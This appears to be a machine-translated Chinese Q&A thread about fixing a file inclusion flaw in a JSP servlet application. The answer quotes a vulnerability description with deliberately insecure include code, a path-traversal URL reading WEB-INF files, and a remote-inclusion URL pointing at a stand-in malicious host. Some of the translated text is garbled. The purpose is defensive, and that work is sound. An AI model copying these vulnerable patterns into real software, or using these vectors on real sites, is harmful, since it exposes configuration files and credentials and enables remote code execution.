請幫助我,我怎麼能解決危險的文件包含:從 網站我的工作在當地的漏洞。危險的文件包含:本地漏洞
如
http://test.abc.com:80/abc.jsp?AccessKey=/..//WEB-INF/web.xml
它JSP servlet的應用。
感謝
請幫助我,我怎麼能解決危險的文件包含:從 網站我的工作在當地的漏洞。危險的文件包含:本地漏洞
如
http://test.abc.com:80/abc.jsp?AccessKey=/..//WEB-INF/web.xml
它JSP servlet的應用。
感謝
我無法訪問該網頁,但有一個如何避免錯誤此信息:
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/java/dangerous_file_inclusion.html
危險文件包含
允許未經驗證的用戶輸入控制在JSP中動態包含 的文件可能導致惡意代碼執行。說明
許多現代網頁腳本語言通過在一個封裝文件中包含其他源文件 的能力來實現代碼重用和模塊化。這種功能通常用於將 標準外觀和應用(模板)應用,共享功能 而不需要編譯代碼,或將代碼分解成更小的更易於管理的文件。包含的文件被解釋爲 父文件的一部分,並以相同的方式執行。當包含文件的路徑由未驗證的用戶輸入控制 時,會發生文件包含 漏洞。
示例1:以下是本地文件包含 漏洞的示例。示例代碼使用用戶指定的模板名稱 ,並將其包括在要呈現的JSP頁面中。
<jsp:include page="<%=(String)request.getParameter(\"template\")%>">
如果攻擊者指定一個有效文件,以動態包括 聲明,該文件的內容將被傳遞給JSP 解釋的頁面上呈現。
在窗體的攻擊向量的情況下
specialpage.jsp?模板=/WEB-INF /數據庫/ passwordDB
的JSP解釋將使 /WEB-INF的內容/ database/passwordDB文件到JSP頁面,從而損害系統的安全性 。更糟糕的是,如果攻擊者可以指定攻擊者控制的遠程站點路徑控制 ,那麼動態include語句將執行 攻擊者提供的任意惡意代碼。
示例2:下面顯示了一個遠程文件包含漏洞的示例 。示例代碼使用c:import標籤將用戶 指定的遠程文件導入當前JSP頁面。
<c:import url="<%= request.getParameter("privacy")%>">
形式
policy.jsp?隱私的攻擊向量= http://www.malicioushost.com/attackdata.js
可從由攻擊者控制的遠程站點 惡意代碼注入當前JSP頁。
所以,你應該檢查包括你的JSP的
比KS itworked :) – aru 2014-08-27 10:14:33